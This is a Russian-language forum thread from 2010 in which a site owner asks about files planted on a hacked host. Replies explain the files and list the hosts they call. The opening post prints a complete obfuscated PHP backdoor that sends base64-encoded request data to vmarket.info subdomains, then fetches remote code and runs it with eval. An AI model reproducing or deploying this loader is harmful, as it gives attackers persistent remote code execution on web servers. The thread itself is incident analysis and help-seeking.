По ходу хост взломали подскажите что это за хе*ня в папках

Тема в разделе "Мегафлуд", создана пользователем alex-bot, 12 дек 2010.

Статус темы:
Закрыта.
  1. alex-bot

    alex-bot Nulled-Man

    Регистр.:
    4 май 2007
    Сообщения:
    498
    Симпатии:
    144
    В общем в один прекрасный день обнаружил кучу говна, в своих папках .Htaccess:
    и php файл
    PHP:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("dm1hcmtldC5pbmZv");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="bb809830f5a3c7e9f193b5729da1f675"$f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
    Я так понял отсюда ноги растут
    vmarket.info
    Что от этого происходит, насколько опасно они что-то исталят? Кто в теме объсните что к чему там.
     
  2. Skilz

    Skilz Создатель

    Регистр.:
    9 дек 2010
    Сообщения:
    15
    Симпатии:
    2
    eval(); - означает что происходит исполнение php кода из переменной

    код подгружают отсюда:
    http://7ads.vmarket.info
    либо отсюда:
    http://7.vmarket.info
    либо отсюда:
    http://71.vmarket.info

    проверьте, что у вас на этих поддоменах
     
  3. alex-bot

    alex-bot Nulled-Man

    Регистр.:
    4 май 2007
    Сообщения:
    498
    Симпатии:
    144
    Это не мои домены, там типа партнерки какой-то, думал может кто из нулледа знает кто это или что? А то сейчас времени нет, проверять десятки папок и удалять эту фигню оставлю на несколько дней... потом, почищу... может кто подскажет как лучше (быстрее) проверить все директории хостинга на наличие этого) так то конечно видно дату изменения папки, но в плане автоматизации или это нереально?
     
  4. detanatar

    detanatar Постоялец

    Регистр.:
    11 мар 2010
    Сообщения:
    114
    Симпатии:
    32
    Вероятно шелл на сайте.
    Сообщите хостеру, платонам.
    Хостеры должны сами почистить.
     
Статус темы:
Закрыта.